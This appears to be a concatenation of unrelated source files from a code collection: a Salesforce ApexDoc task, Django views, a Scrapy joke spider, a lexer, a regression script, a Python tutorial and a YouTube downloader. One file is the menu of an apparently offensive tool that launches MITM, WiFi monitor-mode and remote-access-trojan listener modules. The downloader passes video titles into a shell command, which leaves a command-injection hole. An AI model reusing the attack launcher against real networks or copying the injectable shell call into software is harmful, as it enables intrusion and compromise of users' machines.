if self.project_config.project__apexdoc__homepage
else None
)
if "banner_page" not in self.options:
self.options["banner_page"] = (
self.project_config.project__apexdoc__banner
if self.project_config.project__apexdoc__banner
else None
)
if "scope" not in self.options:
self.options["scope"] = (
self.project_config.project__apexdoc__scope
if self.project_config.project__apexdoc__scope
else None
)
if "version" not in self.options:
if not self.project_config.project__apexdoc__version:
raise CumulusCIException("ApexDoc version required")
self.options["version"] = self.project_config.project__apexdoc__version
def _init_task(self):
super(GenerateApexDocs, self)._init_task()
self.working_dir = tempfile.mkdtemp()
self.jar_path = os.path.join(self.working_dir, self.jar_file)
if self.options["tag"] and not self.project_config.project__git__repo_url:
raise CumulusCIException("Repo URL not found in cumulusci.yml")
def _run_task(self):
self._get_jar()
cmd = "java -jar {} -s {} -t {}".format(
self.jar_path, self.options["source_directory"], self.options["out_dir"]
)
if self.options["tag"]:
cmd += " -g {}/blob/{}/src/classes/".format(
self.project_config.project__git__repo_url, self.options["tag"]
)
if self.options["home_page"]:
cmd += " -h {}".format(self.options["home_page"])
if self.options["banner_page"]:
cmd += " -a {}".format(self.options["banner_page"])
if self.options["scope"]:
cmd += ' -p "{}"'.format(self.options["scope"])
self.options["command"] = cmd
self._run_command({})
def _get_jar(self):
url = "{}/releases/download/{}/{}".format(
self.apexdoc_repo_url, self.options["version"], self.jar_file
)
urllib.request.urlretrieve(url, self.jar_path)
|
19,728 | 41a26a6eb10448b066027b0e7cf99c77d679fd03 | import logging
from cloud_scanner.contracts import Resource, ResourceStorageFactory
class ResourceStorage:
"""Store resources from scanning."""
@staticmethod
def process_queue_message(message):
"""Receives resources from queue and stores in registered service.
:param message: Payload of resources to store
:return: Number of resources stored in service
"""
resource_storage = ResourceStorageFactory.create()
resources = _parse_resources(message)
resource_storage.write_entries(resources)
return len(resources)
def _parse_resources(message):
"""Parse message from queue as JSON of resources.
:param message: JSON of resources
:return: Deserialized list of Resource objects
"""
resource_list = message.get_json()
# Convert message into a list if it isn"t already
if not isinstance(resource_list, list):
resource_list = [resource_list]
logging.info(f"Found {len(resource_list)} resources to process")
resource_list = [Resource(resource) for resource in resource_list]
return resource_list
|
19,729 | 9fc901f099b87b5afd6b1203995577fda7195f76 |
from tests.BaseTestCase import BaseTestCase
from workflow_ignitor.issue.Issue import Issue
class testIssue( BaseTestCase ):
def testConstructorPositional( self ):
'''
Tests constructor using only positional arguments.
'''
instance = Issue( 'foo', 'bar' )
self.assertEqual( 'foo', instance.title, 'Invalid title' )
self.assertEqual( 'bar', instance.descr, 'Invalid description' )
def testConstructorKeywords( self ):
'''
Tests constructor using keyword arguments.
'''
instance = Issue( 'foo', descr = 'bar' )
self.assertEqual( 'foo', instance.title, 'Invalid title' )
self.assertEqual( 'bar', instance.descr, 'Invalid description' )
def testExists( self ):
'''
Tests constructor using keyword arguments.
'''
instance = Issue( 'foo', id = 11000 )
self.assertTrue( instance.exists(), 'Invalid ret value' )
def testExistsInvalid( self ):
'''
Tests constructor using keyword arguments.
'''
instance = Issue( 'foo' )
self.assertFalse( instance.exists(), 'Invalid ret value' )
|
19,730 | 4fe48220ec27703036be75c0a4672e8df18b245c | # -*- coding: utf-8 -*-
import scrapy
from joke.items import JokeItem
class JokesSpider(scrapy.Spider):
name = 'jokes'
allowed_domains = ['xiaohua.zol.com.cn']
baseURL = "http://xiaohua.zol.com.cn/new/"
offset = 0
start_urls = [baseURL+str(offset)+".html"]
def parse(self, response):
node_list = response.xpath("//li[@class='article-summary']")
for node in node_list:
item = JokeItem()
# item['content'] = node
title = node.xpath("./span[@class='article-title']/a/text()").extract()
if title:
title = title[0]
item['title'] = title
source = node.xpath("./div[@class='article-source']/a/text()").extract()
if source:
source = source[0]
item['source'] = source
sourceUrl = node.xpath("./div[@class='article-source']/a/@href").extract()
if sourceUrl:
sourceUrl = sourceUrl[0]
item['sourceUrl'] = sourceUrl
content = node.xpath("./div[@class='summary-text']/text()").extract()
if content:
content = content[0]
item['content'] = content
DetailsText = node.xpath("./div[@class='article-commentbar articleCommentbar clearfix']/a/@href").extract()
if DetailsText:
DetailsText = DetailsText[0]
item['DetailsText'] = DetailsText
like = node.xpath("./div[@class='article-commentbar articleCommentbar clearfix']/div[@class='good-btn-box vote-btn']/em/span/text()").extract()
if like:
like = like[0]
item['like'] = like
yield item
if self.offset < 2:
self.offset += 1
url = self.baseURL + str(self.offset) +".html"
yield scrapy.Request(url,callback = self.parse) |
19,731 | 8ac9426a1b31374412ef24cdcad29caf08d187c1 | # !/usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
ERP+
"""
__author__ = ['António Anacleto', 'Jair Medina', 'Abner Oliveira']
__credits__ = []
__version__ = "1.0"
__maintainer__ = ['António Anacleto', 'Jair Medina', 'Jair Medina', 'Abner Oliveira']
__status__ = "Development"
__model_name__= 'mapa_gestao.MapaGestao'
#import base_models#auth,
from orm import *
from form import *
class MapaGestao(Model, View):
def __init__(self, **kargs):
Model.__init__(self, **kargs)
self.__name__ = 'mapa_gestao'
self.__title__= 'Mapa Gestão'
self.__model_name__ = __model_name__
self.__list_edit_mode__ = 'edit'
self.__workflow__ = (
'estado', {'Rascunho':['Imprimir', 'Valores0', 'Imp.Excel', 'Imp.Primavera', 'Imp.PHC'], 'Confirmado':['Imprimir']}
)
self.__workflow_auth__ = {
'Imprimir':['All'],
'Valores0':['All'],
'Imp.Excel':['All'],
'Imp.PHC':['All'],
'Imp.Primavera':['All'],
'Rascunho':['Gestor'],
}
self.nif = string_field(view_order=1, name='Nif', size=80)
self.ano_fiscal = string_field(view_order=2, name='Ano Fiscal', size=5)
self.estado = info_field(view_order=3, name ='Estado', default='Rascunho', onlist=False, hidden=True, nolabel=True,)
self.mapa = combo_field(view_order=4, name ='Mapa', options=[('balancete','Balancete'), ('balanco','Balanço'), ('demonst_resul','Demonstração de Resultado'), ('fluxoCaixa','Fluxo de Caixa')], onlist=False, default='Praia')
self.linha_mapa_gestao = list_field(view_order = 5, name = 'Valores', model_name = 'linha_mapa_gestao.LinhaMapaGestao', condition = "factura_cli='{id}'", list_edit_mode = 'inline', onlist = False)
|
19,732 | 20847826d8f61e19a1bd4511796ef5ad9127ba1c | #lexer class
import enum, sys
class Lexer:
def __init__(self, source):
# initialize cursors and adding \n to the source to make it easier to parse
self.source = source + '\n'
self.cur_char = ''
self.cur_pos = -1
self.next_char()
# Process next char
def next_char(self):
self.cur_pos += 1
if self.cur_pos >= len(self.source):
self.cur_char = '\0' # EOF
else:
self.cur_char = self.source[self.cur_pos]
# Return lookahead char
def peek(self):
if self.cur_pos + 1 >= len(self.source):
return '\0'
return self.source[self.cur_pos+1]
# Invalid Token
def abort(self, message):
sys.exit('Lexing error. ' + message)
# Skip Whitespace
def skip_white_space(self,):
while self.cur_char == ' ' or self.cur_char == '\t' or self.cur_char == '\r':
self.next_char()
# Skip Comments
def skip_comment(self,):
if self.cur_char == '#':
while self.cur_char != '\n':
self.next_char()
# Return next token
def get_token(self,):
self.skip_white_space()
self.skip_comment()
if self.cur_char == '+':
token = Token(self.cur_char, Token_Type.PLUS)
elif self.cur_char == '-':
token = Token(self.cur_char, Token_Type.MINUS)
elif self.cur_char == '*':
token = Token(self.cur_char, Token_Type.ASTERISK)
elif self.cur_char == '/':
token = Token(self.cur_char, Token_Type.SLASH)
elif self.cur_char == '\n':
token = Token(self.cur_char, Token_Type.NEWLINE)
elif self.cur_char == '\0':
token = Token(self.cur_char, Token_Type.EOF)
elif self.cur_char == "=":
if self.peek() == '=':
last_char = self.cur_char
self.next_char()
token = Token(last_char+self.cur_char, Token_Type.EQEQ)
else:
token = Token(self.cur_char, Token_Type.EQ)
elif self.cur_char == '>':
if self.peek() == '=':
last_char = self.cur_char
self.next_char()
token = Token(last_char+self.cur_char, Token_Type.GTEQ)
else:
token = Token(self.cur_char, Token_Type.GT)
elif self.cur_char == '<':
if self.peek() == '=':
last_char = self.cur_char
self.next_char()
token = Token(last_char+self.cur_char, Token_Type.LTEQ)
else:
token = Token(self.cur_char, Token_Type.LT)
elif self.cur_char == '!':
if self.peek() == '=':
last_char = self.cur_char
self.next_char()
token = Token(last_char+self.cur_char, Token_Type.NOTEQ)
else:
self.abort('Expected !=, got {}'.format(self.peek()))
elif self.cur_char == '\"':
self.next_char()
start_pos = self.cur_pos
while self.cur_char != '\"':
# No support for special character... maybe later
if self.cur_char == '\r' or self.cur_char == '\n' or self.cur_char == '\t' or self.cur_char == '%': # Fix for pep8
self.abort('Illegal character in string')
self.next_char()
token_text = self.source[start_pos:self.cur_pos]
token = Token(token_text, Token_Type.STRING)
elif self.cur_char.isdigit():
start_pos = self.cur_pos
while self.peek().isdigit():
self.next_char()
if self.peek() == '.':
self.next_char()
if not self.peek().isdigit():
self.abort('Illegal character in number.')
while self.peek().isdigit():
self.next_char()
token_text = self.source[start_pos:self.cur_pos+1]
token = Token(token_text, Token_Type.NUMBER)
elif self.cur_char.isalpha():
start_pos = self.cur_pos
while self.peek().isalnum():
self.next_char()
token_text = self.source[start_pos:self.cur_pos+1]
keyword = Token.check_keyword(token_text)
if keyword is None:
token = Token(token_text, Token_Type.IDENT)
else:
token = Token(token_text, keyword)
else:
# Unkown
self.abort('Unkown token: {}'.format(self.cur_char))
self.next_char()
return token
#token class
class Token:
def __init__(self, token_text, token_kind):
self.text = token_text
self.kind = token_kind
@staticmethod
def check_keyword(token_text:str):
'''
token_text: str, identifier text
returns
Token_Type: check if the given token is or not a keyword
'''
for kind in Token_Type:
if kind.name == token_text and kind.value >= 100 and kind.value < 200:
return kind
return None
class Token_Type(enum.Enum):
EOF = -1
NEWLINE = 0
NUMBER = 1
IDENT = 2
STRING =3
# KEYWORD
LABEL = 101
GOTO = 102
PRINT = 103
INPUT = 104
LET = 105
IF = 106
THEN = 107
ENDIF = 108
WHILE = 109
REPEAT = 110
ENDWHILE = 111
# OPERATORS
EQ = 201
PLUS = 202
MINUS = 203
ASTERISK = 204
SLASH = 205
EQEQ = 206
NOTEQ = 207
LT = 208
LTEQ = 209
GT = 210
GTEQ = 211
|
19,733 | 6577749390f10da272263acf8b2fd573fe14ceb5 | from django.core import serializers
from django.shortcuts import render, get_object_or_404
from django.urls import reverse
from django.http import JsonResponse
from . import models
def home(request):
return render(request, "business01/home.html", {
'businesses': models.Business.objects.all(),
})
def business_list(request):
return render(request, "business01/list.html", {
'businesses': models.Business.objects.all(),
})
def business(request, pk):
business = get_object_or_404(models.Business.objects, id=pk)
context = {
'business' : business,
}
return render(request, "business01/business_detail.html", context)
def api(request):
business = request.GET.get('business')
businesses = models.Business.objects.all()
data = {
"businesses": [w.to_json() for w in businesses],
}
return JsonResponse(data)
|
19,734 | b6e3c4ada4b9b37dc29ad214779df4bbeceab5a5 | from tests.helpers.mock_response import MockResponse
def mocked_success_get(*args, **kwargs):
raw_response = {
"result": {
"data": {
"allContentstackArticles": {
"nodes": [
{
"banner": {
"url": "https://example.com"
},
"date": "2020-11-25T12:00:00.000Z",
"description": "Random Description",
"title": "Random Title",
"id": "Random Id",
"external_link": "",
"url": {
"url": "/news/random-post/"
}
}
]
}
}
}
}
return MockResponse(raw_response, 200)
|
19,735 | 4d4497ae246cc9dcbb1cc3a677e2281a2e61224d | import math
import Statistic as st
num_friends =[100,49,41,40,25,21,21,19,19,18,18,16,15,15,15,15,14,14,13,13,13,13,12,12,11,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,8,8,8,8,8,8,8,8,8,8,8,8,8,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]
daily_minutes = [1,68.77,51.25,52.08,38.36,44.54,57.13,51.4,41.42,31.22,34.76,54.01,38.79,47.59,49.1,27.66,41.03,36.73,48.65,28.12,46.62,35.57,32.98,35,26.07,23.77,39.73,40.57,31.65,31.21,36.32,20.45,21.93,26.02,27.34,23.49,46.94,30.5,33.8,24.23,21.4,27.94,32.24,40.57,25.07,19.42,22.39,18.42,46.96,23.72,26.41,26.97,36.76,40.32,35.02,29.47,30.2,31,38.11,38.18,36.31,21.03,30.86,36.07,28.66,29.08,37.28,15.28,24.17,22.31,30.17,25.53,19.85,35.37,44.6,17.23,13.47,26.33,35.02,32.09,24.81,19.33,28.77,24.26,31.98,25.73,24.86,16.28,34.51,15.23,39.72,40.8,26.06,35.76,34.76,16.13,44.04,18.03,19.65,32.62,35.59,39.43,14.18,35.24,40.13,41.82,35.45,36.07,43.67,24.61,20.9,21.9,18.79,27.61,27.21,26.61,29.77,20.59,27.53,13.82,33.2,25,33.1,36.65,18.63,14.87,22.2,36.81,25.53,24.62,26.25,18.21,28.08,19.42,29.79,32.8,35.99,28.32,27.79,35.88,29.06,36.28,14.1,36.63,37.49,26.9,18.58,38.48,24.48,18.95,33.55,14.24,29.04,32.51,25.63,22.22,19,32.73,15.16,13.9,27.2,32.01,29.27,33,13.74,20.42,27.32,18.23,35.35,28.48,9.08,24.62,20.12,35.26,19.92,31.02,16.49,12.16,30.7,31.22,34.65,13.13,27.51,33.2,31.57,14.1,33.42,17.44,10.12,24.42,9.82,23.39,30.93,15.03,21.67,31.09,33.29,22.61,26.89,23.48,8.38,27.81,32.35,23.84]
def predict(alpha,belta,x_i):
return alpha + belta*x_i
def error(alpha,belta,x_i,y_i):
return y_i - predict(alpha,belta,x_i)
def sum_of_squared_error(alpha,belta,x,y):
return sum(error(alpha,belta,x_i,y_i)**2 for x_i,y_i in zip(x,y))
def least_squares_fit(x,y):
beta = st.correlation(x,y)*st.standard_derivation(y)/st.standard_derivation(x)
alpha = st.mean(y) - beta * st.mean(x)
return alpha,beta
alpha,beta = least_squares_fit(num_friends,daily_minutes)
print alpha,beta
def total_sum_of_squares(y):
return sum(v**2 for v in st.de_mean(y))
def r_squared(alpha,beta,x,y):
return 1- (sum_of_squared_error(alpha,beta,x,y)/(1.0*total_sum_of_squares(y)))
print r_squared(alpha,beta,num_friends,daily_minutes)
|
19,736 | 193a8e967fc4c9a8421f53f9f9a9023c29fe24ca | import sys
import os
from .util import bcolors, clear, RepresentsInt
from ..attack.mitm import start
from ..attack.wifi import normalMode, monitorMode, startWifi
from ..attack.rat import listen
import atexit
@atexit.register
def restore():
interface = os.popen('ship -i').read()
# Array of interfaces
interArr = os.popen('ship -A').read().split(' ')
if 'Local' in interface:
interface = interArr[1]
# Retore wifi
if 'mon' in interface:
normalMode(interface)
print(bcolors.OKGREEN + "\nRestoring system settings." + bcolors.ENDC)
def run():
clear()
# Print loaded modules
printModule()
# Take user input as int
choice = input("\n" + bcolors.BOLD +
"Please choose an option\n> " + bcolors.ENDC)
if (RepresentsInt(choice)):
# Convert in int
choice = int(choice)
# Run list
if choice == 1:
clear()
# print(bcolors.FAIL + "WIP" + bcolors.ENDC)
startWifi()
run()
elif choice == 2:
clear()
# run mitm
start()
# Recursion
run()
elif choice == 3:
clear()
# Run RAT Listener
listen()
run()
elif choice == 4:
clear()
print(bcolors.OKGREEN + "Goodbye!" + bcolors.ENDC)
sys.exit(0)
else:
clear()
print(bcolors.FAIL + "Please input a valid option." + bcolors.ENDC)
run()
else:
clear()
print(bcolors.FAIL + "Please input a valid option." + bcolors.ENDC)
# Recusive loop
run()
def printModule():
print(str(bcolors.HEADER + "Loaded Modules: " + bcolors.ENDC))
print("1) WiFi Module")
print("2) MITM Module")
print("3) RAT Module")
print("4) Exit boa")
|
19,737 | 3f019a16af0cfffec420e784e6e8348f1127734c | #3. 내장 자료형의 기초
#1 수치 자료형
#1-1 정수형 상수
a = 23
b = 0o23
c = 0x23
print(type(a), type(b), type(c))
print(a, b, c)
import sys
print(sys.maxsize)
#1-2 실수형 상수
a = 1.2
b = 3.5e3
c = -0.2e-4
print(type(a), type(b), type(c))
print(a, b, c)
print()
#1-3 롱형 상수
#메모리가 허용하는 한 유효자리수는 무한대
h1 = 12345678912345678901234556970
print(type(h1))
print(h1*h1)
print()
#1-5 수치 자료형의 치환
x = 1
x = 2
#x가 지니는 1의 값이 변경되는 것이 아니라 새로운 객체 2로 레퍼런스를 변경
#1-6 수치 연산과 관련된 내장 함수
print(abs(-3))
print(int(3.141))
print(int(-3.131))
print(float(5))
print(complex(3.4, 5))
print(complex(6))
print(divmod(5, 2))
print()
print(pow(2,3))
print(pow(2.3,3.5))
#1-7 math 모듈의 수치 연산 함수
import math
print(math.pi)
print(math.e)
print(math.sin(1.0))
print(math.sqrt(2))
print()
r = 5.0
a = math.pi
degree = 60.0
rad = math.pi * degree / 180.0
print(math.sin(rad), math.cos(rad), math.tan(rad))
#2 문자열
#2-1 문자열 형식
print('Hello World!')
print("Hello World!")
#여러분 문자열 형식
multiline = """
To be, or not to be
that is the question
"""
print(multiline)
multiline2 = '''
To be, or not to be
that is the question
'''
print(multiline2)
#2-2 인덱싱과 슬라이싱
s = 'Hello world!'
print(s[0])
print(s[1])
print(s[-1])
print(s[-2])
s = 'Hello world!'
print(s[1:3])
print(s[0:5])
print()
s = 'Hello'
print(s[1:])
print(s[:3])
print(s[:])
print()
s = 'abcd'
print(s[::2])
print(s[::-1])
#문자열 자료형은 변경되지 않는다.
s = 'Hello World'
#s[0] = 'h'
#따라서 문자열을 변경하려면 슬라이싱 및 연결 연산을 주로 이용한다.
s = 'h' + s[1:]
print(s)
#2-3문자열 연산
# + : 연결, * : 반복
print('Hello' + '' + 'World')
print('Hello' * 3)
print('-' * 60)
#2-4문자열의 길이
s = 'Hello World'
print(len(s))
#2-5 문자열내 포함 관계 여부
#in, not in: 문자열내 일부 문자열이 포함되어 있는지 파악하는 키워드
s = 'Hello World'
print('World' in s)
print('World' not in s)
|
19,738 | ec041b7463f5a55f7db43ec81323326f45a95573 | import os
CONFIG = {
"place_snowball_stem": True,
"anonymize": True,
"db_user": "kaira",
"db_admin": os.getenv("DB_ADMIN_NAME") or "postgres",
"db_name": "learning-from-our-past",
"db_port": os.getenv('DB_PORT') or 5432,
"users_whose_edits_can_be_overridden": ["kaira"] # Changes made by these users will not be preserved in the db
}
|
19,739 | 35c12b4c1bba8b4768012e6a7a1c2fbfe0b4954e | from .StocksResponseSchema import StocksResponseSchema #noqa |
19,740 | c9f0bceb15620033b70e3387a85b17ba5f5e73ef | from django.contrib import admin
from django.urls import path
from django.urls import include, path
from CAM import views
urlpatterns = [
path('', views.probe, name='CAM'),
path('probe/', views.probe, name='CAM_probe'),
path('measure/', views.measure, name='CAM_measure'),
path('cnc/', views.cnc, name='CAM_cnc'),
]
|
19,741 | 4d3274ec641b070e7f68e2b60d141bc1d5e1eda2 | """
4) Baseando-se no exercício 3 adicione um método construtor que permita
a definição de todos os atributos no momento da instanciação do objeto.
"""
from secao17_heranca_polimorfismo.exercicios1.questao3 import Quadrado
class Quadrado2(Quadrado):
def __init__(self):
"""Construtor Padrão que chama a Classe Pai"""
super().__init__(0)
if __name__ == "__main__":
q1 = Quadrado2()
q1.lado = 87.9
q1.imprimir()
q1.calcular_area()
q1.imprimir()
q1.calcular_perimetro()
q1.imprimir()
|
19,742 | 84b8b49074ad007c460259cbb12ea89644d73ec5 | import uuid
# from django.conf import settings
from django.db import models
from django.utils.translation import gettext_lazy as _
from django.contrib.sites.models import Site
from django.contrib.sites.managers import CurrentSiteManager
from django.urls import reverse
from autoslug import AutoSlugField
class Organization(models.Model):
name = models.CharField(_("Name"), max_length=80)
uuid = models.UUIDField(_("UUID"), default=uuid.uuid4, editable=False, unique=True)
slug = AutoSlugField(populate_from='name', unique=True, always_update=True)
site = models.ForeignKey(Site, on_delete=models.CASCADE, related_name="organizations") # Overwriting this field from Base Class to change the related_name
personal = models.BooleanField(default=False)
owner = models.ForeignKey('saasy.SaasyProfile', verbose_name=_("Organization Owner"), on_delete=models.CASCADE, related_name="organizations") # The top level person who controls the whole org
objects = models.Manager()
on_site = CurrentSiteManager()
class Meta:
verbose_name = _("Organization")
verbose_name_plural = _("Organizations")
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse( "saasy:organization-detail", kwargs={"slug": self.slug})
def get_update_url(self):
return reverse( "saasy:organization-update", kwargs={"slug": self.slug})
def get_delete_url(self):
return reverse( "saasy:organization-delete", kwargs={"slug": self.slug})
def get_membership_url(self):
return reverse( "saasy:membership-update", kwargs={"slug": self.slug})
|
19,743 | fb4d070ce758058c4842d44ee2b72281847dbf33 | # Percorrendo frases (strings) com while
frase = 'Ola seja bem vindo!'
contador = 0
while contador < len(frase):
print(frase[contador])
contador += 1
frase_2 = 'O rato roeu a roupa do rei de roma.'
contador_2 = 0
nova_frase = ''
while contador_2 < len(frase_2):
letra = frase_2[contador_2]
if letra == 'r':
nova_frase += 'R'
else:
nova_frase += letra
contador_2 += 1
print(nova_frase) |
19,744 | 666d6351ddda072fa7cd1114c2ecdcdf69ad689a |
count=0
with open("denemeee.txt","r") as file:
while file.readline() is not '':
file.readline()
count+=1
print(count) |
19,745 | 38f5fb0a7e9b5fa6c2feef5d860ef35c0a90f3f1 | import numpy as np
import math
import matplotlib.pyplot as plt
from .demo import get_topology, plot_mesh_general
from ..opt.optimizer_robot import heart_shape
from .. import arguments
def plot_mesh(args):
path = args.root_path + '/' + args.solutions_path + '/linear/u000000.vtu'
plot_mesh_general(path)
def plot_sol(args, name):
path = args.root_path + '/' + args.solutions_path + \
'/linear/' + name + '000000.vtu'
x, u, tri = get_topology(path)
colors = u
fig = plt.figure(figsize=(8, 8))
plt.gca().set_aspect('equal')
plt.axis('off')
tpc = plt.tripcolor(x[:, 0], x[:, 1], tri, colors,
shading='flat', vmin=None, vmax=None)
cb = plt.colorbar(tpc, aspect=20, shrink=0.5)
cb.ax.tick_params(labelsize=20)
fig.savefig(args.root_path + '/images/linear/' +
name + '.png', bbox_inches='tight')
def plot_L(args):
path_a = args.root_path + '/' + args.numpy_path + '/linear/L_inf_a.npy'
path_s = args.root_path + '/' + args.numpy_path + '/linear/L_inf_s.npy'
L_inf_a = np.load(path_a)[:-1]
L_inf_s = np.load(path_s)[:-1]
truncate_idx = 31
print(L_inf_s)
print(L_inf_a)
fig = plt.figure()
ax = fig.gca()
epoch = np.arange(0, len(L_inf_a) , 1)
ax.plot(epoch[:truncate_idx], L_inf_a[:truncate_idx], linestyle='--',
marker='o', color='red', label='AmorFEA')
ax.plot(epoch[:truncate_idx], L_inf_s[:truncate_idx], linestyle='--', marker='o',
color='blue', label='Supervised Training')
ax.set_yscale('log')
ax.legend(loc='upper right', prop={'size': 12})
ax.tick_params(labelsize=14)
fig.savefig(args.root_path + '/images/linear/L.png', bbox_inches='tight')
# plt.yticks(np.arange(min(L_inf_a), max(L_inf_a)+1, 1.0))
# ax.ticklabel_format(style='sci', axis='y', scilimits=(0, 0))
if __name__ == '__main__':
args = arguments.args
plot_mesh(args)
plot_sol(args, 'f')
plot_sol(args, 'u')
plot_L(args)
plt.show()
|
19,746 | 8753f8228f5eabc823cd92d235a05541e38e7cfc | #https://keflavich-astropy.readthedocs.io/en/latest/coordinates/observing-example.html
#https://docs.astropy.org/en/stable/coordinates/
import astropy as ast
from astropy.coordinates import SkyCoord, EarthLocation, AltAz, get_body, ICRS
import datetime
from ICRS_coordinates import ICRS_coordinates
class coordinates_manager():
def __init__(self):
self.lat = 0.0
self.lon = 0.0
self.height = 0.0
self.utcoffset = 0.0
self.loc = None
self.target = None
self.az = 0.0
self.alt = 0.0
def setLocation(self, lat, lon, height, utc_offset):
self.lat = lat
self.lon = lon
self.height = height
self.utcoffset = utc_offset * ast.units.hour
self.loc = EarthLocation(lat=lat, lon=lon, height=200)
ast.utils.iers.conf.auto_download = False
return True
def setTarget(self, s, target_type):
if target_type == 0: #NGC or Messier Object
a = ICRS_coordinates()
if a.setObject(s) == True:
objCoor = a.getICRSCoord()
self.target = SkyCoord(frame=ICRS,ra=objCoor[0]*ast.units.deg, dec=objCoor[1]*ast.units.deg)
else:
return False
elif target_type == 1: #solar system object
self.target = get_body(s, time=ast.time.Time(datetime.datetime.now())-self.utcoffset) #Remember to take into account UTC offset!
elif target_type == 2: #other
self.target = SkyCoord.from_name(s)
return True
def getCoordinate(self):
ctime = datetime.datetime.now() #current time (according to this computer)
#https://docs.astropy.org/en/stable/api/astropy.time.Time.html#astropy.time.Time
#Convert to astropy Time object
t = ast.time.Time(ctime)
#Account for offset to UTC
t -= self.utcoffset
#https://docs.astropy.org/en/stable/coordinates/transforming.html
#https://docs.astropy.org/en/stable/api/astropy.coordinates.AltAz.html
#Transform target to a SkyCoord object with Altitude/Azimuth coordinate system
target_altaz = self.target.transform_to(AltAz(obstime=t,location=self.loc))
#https://docs.astropy.org/en/stable/api/astropy.coordinates.SkyCoord.html#astropy.coordinates.SkyCoord.to_string
return target_altaz.to_string('decimal')
def updateCoordinate(self):
s = self.getCoordinate()
space_pos = 0
for i in range(0,len(s),1):
if s[i] == " ":
space_pos = i
break
az_new = float(s[0:space_pos])
alt_new = float(s[space_pos+1:len(s)])
self.az = az_new
self.alt = alt_new
return True
|
19,747 | 910736f28f7dd846b7b226b15c03f3dc10f2829c | from output.models.nist_data.atomic.short.schema_instance.nistschema_sv_iv_atomic_short_white_space_1_xsd.nistschema_sv_iv_atomic_short_white_space_1 import NistschemaSvIvAtomicShortWhiteSpace1
obj = NistschemaSvIvAtomicShortWhiteSpace1(
value=-6402
)
|
19,748 | 6f38106b13a4a6024283a8553d072e9ebac56ec9 | # -*- coding: utf-8 -*-
'''
YouTube Playlist Downloader
Gurjot Sidhu, 2017
MIT License
Requirements: Python 2.7+/3.x, pafy, bs4, youtube-dl
Provide the URL for a YouTube playlist and the script will download all the
songs in the playlist (up to 100; will add a fix soon) to your local drive.
The file format is .m4a which should work with iTunes.
I recommend using EasyTAG to add ID3 tags to your files.
'''
from __future__ import print_function
from __future__ import unicode_literals
import os
import pafy
import re
import subprocess
import youtube_dl
from string import punctuation
#==============================================================================
# ENTER THE URL FOR THE PLAYLIST HERE
#==============================================================================
print("Pro Tip: To paste press Alt + Space, then select Paste from the Edit menu.\n")
PLAYLIST_URL = str(raw_input("Enter the playlist URL: "))
#==============================================================================
# If you want an MP3 file change the 0 below to 1 (default format is .m4a)
#==============================================================================
print("\nThe default file format is .m4a/.aac (the iTunes one). But there is also an option to download MP3 files.\n")
FORMAT_CHOICE = raw_input("Do you want to download MP3 files? (y/n) ")
if str(FORMAT_CHOICE).lower() == 'y':
FORMAT_MP3 = True
print("Cool. Downloading MP3 files then.\n")
else:
FORMAT_MP3 = False
print("Cool. Downloading m4a/AAC files then.\n")
#==============================================================================
# ENTER THE LOCATION FOR WHERE YOU WANT THE DOWNLOADED FILES TO BE PLACED
#==============================================================================
print("All downloaded files will be placed in the Downloaded Music folder in this directory.\n")
FOLDER_LOCATION = "./Downloaded Music/"
#==============================================================================
# IGNORE EVERYTHING FOLLOWING THIS
#==============================================================================
playlist_json = pafy.get_playlist(PLAYLIST_URL)
titles = []
ids = []
for item in range(len(playlist_json['items'])):
titles.append(playlist_json['items'][item]['playlist_meta']['title'].encode('ascii','ignore'))
ids.append(playlist_json['items'][item]['playlist_meta']['encrypted_id'].encode('ascii','ignore'))
class MyLogger(object):
def debug(self, msg):
pass
def warning(self, msg):
pass
def error(self, msg):
pass
def get_filename(input_title):
# Sanitize string literal
if isinstance(input_title,unicode):
replacement_title = input_title.encode('ascii','ignore')
elif isinstance(input_title,str):
replacement_title = input_title
# Remove brackets and contents
replacement_title = re.sub(re.compile(r'\([^()]*\)'), '', replacement_title)
replacement_title = re.sub(re.compile(r'\[^]*\)'), '', replacement_title)
# Remove trailing and multiple spaces
replacement_title = re.sub(re.compile(r'\s+$'), '', replacement_title)
replacement_title = re.sub(re.compile(r'\s\s+'), '', replacement_title)
# Remove punctuation except dashes
replacement_title = re.sub(re.compile(r'\p{P}(?<!-)'), '', replacement_title)
replacement_title = re.sub(re.compile(r'\|'), '', replacement_title)
replacement_title = replacement_title.strip(punctuation)
return str(replacement_title)
def check_existence(title):
all_files = os.listdir(FOLDER_LOCATION)
if str(title+".m4a") in all_files or str(title+'.mp3') in all_files:
return True
else:
return False
def get_m4a(title, video_id):
video_url = str("https://www.youtube.com/watch?v="+video_id)
# Check if video is available
try:
video = pafy.new(video_url)
# except IOError:
# print("Nope. Looks like this video is unavailable. Skipping it.\n")
# return False
except:
print("There seems to be a problem with this video. Trying to download mp3 version instead.\n")
try:
get_mp3(title, video_id)
return True
except:
print("Nope. Looks like this video is unavailable. Skipping it.\n")
return False
# Fetch audio
audio = video.getbestaudio(preftype="m4a")
FILE_LOCATION = str(FOLDER_LOCATION + title + ".m4a")
try:
audio.download(FILE_LOCATION)
except:
print("Looks like there's a problem. Skipping it.\n")
def get_mp3(title, video_id):
video_url = str("https://www.youtube.com/watch?v="+video_id)
ydl_opts = {
'format': 'bestaudio',
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '192',
}],
'quiet': True,
'ignoreerrors': True,
'logger': MyLogger(),
'outtmpl': str(FOLDER_LOCATION + title + '.%(ext)s')
}
try:
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
ydl.download([video_url])
except:
subprocess.call(str('''youtube-dl -i --quiet --extract-audio --audio-format mp3 -o "''' + FOLDER_LOCATION + title + '.%(ext)s" ' + video_url), shell=True)
#==============================================================================
# Download the shit
#==============================================================================
for i in range(len(ids)):
replacement_title = get_filename(titles[i])
